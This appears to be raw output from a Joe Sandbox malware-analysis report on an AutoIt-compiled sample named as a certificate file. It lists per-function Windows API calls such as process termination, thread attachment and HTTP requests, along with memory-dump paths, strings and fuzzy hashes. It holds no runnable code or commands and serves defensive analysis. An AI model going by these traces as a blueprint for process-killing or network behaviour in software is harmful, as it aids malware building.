                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00887C2C
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00887C3B
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00887C45
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00887C4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00889A33
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A44
                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A51
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A5E
                                                                                  • Part of subcall function 008893D1: CloseHandle.KERNEL32(?,?,00889A6B,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 008893DB
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00889A71
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A78
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                APIs
                                                                                  • Part of subcall function 0085F4EA: std::exception::exception.LIBCMT ref: 0085F51E
                                                                                  • Part of subcall function 0085F4EA: __CxxThrowException@8.LIBCMT ref: 0085F533
                                                                                • __swprintf.LIBCMT ref: 00841EA6
                                                                                Strings
                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00841D49
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                • API String ID: 2125237772-557222456
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0089B006
                                                                                • CharUpperBuffW.USER32(?,?), ref: 0089B115
                                                                                • VariantClear.OLEAUT32(?), ref: 0089B298
                                                                                  • Part of subcall function 00889DC5: VariantInit.OLEAUT32(00000000), ref: 00889E05
                                                                                  • Part of subcall function 00889DC5: VariantCopy.OLEAUT32(?,?), ref: 00889E0E
                                                                                  • Part of subcall function 00889DC5: VariantClear.OLEAUT32(?), ref: 00889E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                APIs
                                                                                  • Part of subcall function 0085C6F4: _wcscpy.LIBCMT ref: 0085C717
                                                                                • _memset.LIBCMT ref: 00885438
                                                                                • GetMenuItemInfoW.USER32(?), ref: 00885467
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00885513
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0088553D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                • String ID: 0
                                                                                • API String ID: 4152858687-4108050209
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0088027B
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008802B1
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008802C2
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00880344
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00885075
                                                                                • GetMenuItemInfoW.USER32 ref: 00885091
                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 008850D7
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00901708,00000000), ref: 00885120
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1173514356-4108050209
                                                                                • Opcode ID: cc36b7e256b8176a35a2741474c4f7b93ee9a867472f5b409cc670dcd08d291a
                                                                                • Instruction ID: 13647bf32e6fe8e0145f66d8942497e6ed0b11f85dc588627f8be6772b469ecb
                                                                                • Opcode Fuzzy Hash: cc36b7e256b8176a35a2741474c4f7b93ee9a867472f5b409cc670dcd08d291a
                                                                                • Instruction Fuzzy Hash: 63418E752047019FD720AF28D884F6ABBE9FF85314F14461EF855D7291D730E904CB62
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 008A0587
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 2358735015-567219261
                                                                                • Opcode ID: b8c22ce3e4b93d65b880757710d1fe5e035d1ac10acfb1108bc763e55e10cd25
                                                                                • Instruction ID: e2e7c3fa10df5c0fe627e008504f00be7ec3eaae2e86a7290809593ee608ccb7
                                                                                • Opcode Fuzzy Hash: b8c22ce3e4b93d65b880757710d1fe5e035d1ac10acfb1108bc763e55e10cd25
                                                                                • Instruction Fuzzy Hash: 1C31B27090021AAFCF04EF68CC419EEB3B4FF65314B00462AE966E76D1DB71E915CB81
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0087B88E
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0087B8A1
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 0087B8D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: e7a63135623b34d55147b66b0a481d7af3d2fe4a75ed1bdcbb461a19e19215db
                                                                                • Instruction ID: fb774636b2da79435810816fd569d560335840b3753f6be3b3005b535277bc29
                                                                                • Opcode Fuzzy Hash: e7a63135623b34d55147b66b0a481d7af3d2fe4a75ed1bdcbb461a19e19215db
                                                                                • Instruction Fuzzy Hash: DE21E171900208AFDB04AB68C886EBE777DFF05354F108129F569E62E5DB748D0A9762
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00894401
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00894427
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00894457
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0089449E
                                                                                  • Part of subcall function 00895052: GetLastError.KERNEL32(?,?,008943CC,00000000,00000000,00000001), ref: 00895067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 1951874230-3916222277
                                                                                • Opcode ID: d20dc35963b4492fe7386b9bab0c35b8c13c9ec971bb2059226bd383d8191e44
                                                                                • Instruction ID: 8523c83b0ecf4e7db3e16c2ab22f6d3e0aaf319166e29cafb39ca30b6c453be5
                                                                                • Opcode Fuzzy Hash: d20dc35963b4492fe7386b9bab0c35b8c13c9ec971bb2059226bd383d8191e44
                                                                                • Instruction Fuzzy Hash: 7D2180B1501608BEEB11AF54CC85EBFB6FCFB48B58F14902AF109E6140EA748D069775
                                                                                APIs
                                                                                  • Part of subcall function 0085D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                  • Part of subcall function 0085D17C: GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                  • Part of subcall function 0085D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008A915C
                                                                                • LoadLibraryW.KERNEL32(?), ref: 008A9163
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008A9178
                                                                                • DestroyWindow.USER32(?), ref: 008A9180
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: fd0bb5226ecbe34bd94b215a990e2eeeff0bd4345bd2adc36090633e3c333080
                                                                                • Instruction ID: 717af374113289a780934f372e7fbe3ec6ceeceb8819df1955abea5f83024ca4
                                                                                • Opcode Fuzzy Hash: fd0bb5226ecbe34bd94b215a990e2eeeff0bd4345bd2adc36090633e3c333080
                                                                                • Instruction Fuzzy Hash: 1A218E7120420ABBFF204E649C84EBB37A9FB9A364F114628F994D6590D775DC41A7A0
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00889588
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008895B9
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 008895CB
                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00889605
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: 42b74f5bb97dc27a1e3213a599cf2e1f4c9cd1560ec140a106a9a0bd7bdd295c
                                                                                • Instruction ID: 710c2d9af06da9f443672627d72b3f9285ced539eb22430fd797bc94d8b44ebc
                                                                                • Opcode Fuzzy Hash: 42b74f5bb97dc27a1e3213a599cf2e1f4c9cd1560ec140a106a9a0bd7bdd295c
                                                                                • Instruction Fuzzy Hash: FE213D70600309ABDB21AF69DC05AAA77B8FF55724F244A29F9A1D72D0E770ED41CB10
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00889653
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00889683
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00889694
                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008896CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: 910f57e2895eb2a25cb3ef985276e9e38d85b2006764e7a764173a9c9ec08431
                                                                                • Instruction ID: 89b606520a1019fd9eb6446636791a2fc842b42c4eab3b244a4ff7ec0a3d5cf7
                                                                                • Opcode Fuzzy Hash: 910f57e2895eb2a25cb3ef985276e9e38d85b2006764e7a764173a9c9ec08431
                                                                                • Instruction Fuzzy Hash: 2F215E716003059BDB20EF699C44EAAB7A8FF65734F280A19F8E1D72D0E770A841CB54
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0088DB0A
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0088DB5E
                                                                                • __swprintf.LIBCMT ref: 0088DB77
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,008DDC00), ref: 0088DBB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                • String ID: %lu
                                                                                • API String ID: 3164766367-685833217
                                                                                • Opcode ID: 48688610376fe6b2d048c53d720f5da7c479b53fe4c324f5b150613c3aca6705
                                                                                • Instruction ID: d424371696ce39189078b7d8759ee80d8c413ccfc3152da7f7b508dd0a1b572d
                                                                                • Opcode Fuzzy Hash: 48688610376fe6b2d048c53d720f5da7c479b53fe4c324f5b150613c3aca6705
                                                                                • Instruction Fuzzy Hash: 6C218335A00208AFCB10EF69C985EAEBBB8FF49704B044069F509E7351DB70EE01CB61
                                                                                APIs
                                                                                  • Part of subcall function 0087C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0087C84A
                                                                                  • Part of subcall function 0087C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0087C85D
                                                                                  • Part of subcall function 0087C82D: GetCurrentThreadId.KERNEL32 ref: 0087C864
                                                                                  • Part of subcall function 0087C82D: AttachThreadInput.USER32(00000000), ref: 0087C86B
                                                                                • GetFocus.USER32 ref: 0087CA05
                                                                                  • Part of subcall function 0087C876: GetParent.USER32(?), ref: 0087C884
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0087CA4E
                                                                                • EnumChildWindows.USER32(?,0087CAC4), ref: 0087CA76
                                                                                • __swprintf.LIBCMT ref: 0087CA90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                • String ID: %s%d
                                                                                • API String ID: 3187004680-1110647743
                                                                                • Opcode ID: 50a717e5d79eaeb1e6dc24011177d5eb96d52678e32f2ec6d939e95035ffe780
                                                                                • Instruction ID: a057295b44501bb66dfb29ec9325e3c138203335b92e535917cf8a25b6739575
                                                                                • Opcode Fuzzy Hash: 50a717e5d79eaeb1e6dc24011177d5eb96d52678e32f2ec6d939e95035ffe780
                                                                                • Instruction Fuzzy Hash: E0119DB16002196BCB11BFA48C86FA97B78FB44714F00807AFA1CEB186DB749546CB72
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008A19F3
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008A1A26
                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008A1B49
                                                                                • CloseHandle.KERNEL32(?), ref: 008A1BBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                • String ID:
                                                                                • API String ID: 2364364464-0
                                                                                • Opcode ID: 73bb98850d9ed0e7bea181c30794d7abf0236e3f5826b8e20542904605e20cff
                                                                                • Instruction ID: a4200c4fbcc9f087ce9508649abef1426fd298abcf0216f0752ee8e30dd33d37
                                                                                • Opcode Fuzzy Hash: 73bb98850d9ed0e7bea181c30794d7abf0236e3f5826b8e20542904605e20cff
                                                                                • Instruction Fuzzy Hash: 9E814370600214ABDF10AF68C886BADBBE5FF45720F148459F905EF382DBB5AD45CB91
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00881CB4
                                                                                • VariantClear.OLEAUT32(00000013), ref: 00881D26
                                                                                • VariantClear.OLEAUT32(00000000), ref: 00881D81
                                                                                • VariantClear.OLEAUT32(?), ref: 00881DF8
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00881E26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: d4451a9be59a82c672b72d463a193b40aa7b317c3293cba675bb53026ecd11ec
                                                                                • Instruction ID: 863cafac8faf3f9b5ec9ab3fcc875d75f161d98e9a85ce30ae27a10cfacb7b60
                                                                                • Opcode Fuzzy Hash: d4451a9be59a82c672b72d463a193b40aa7b317c3293cba675bb53026ecd11ec
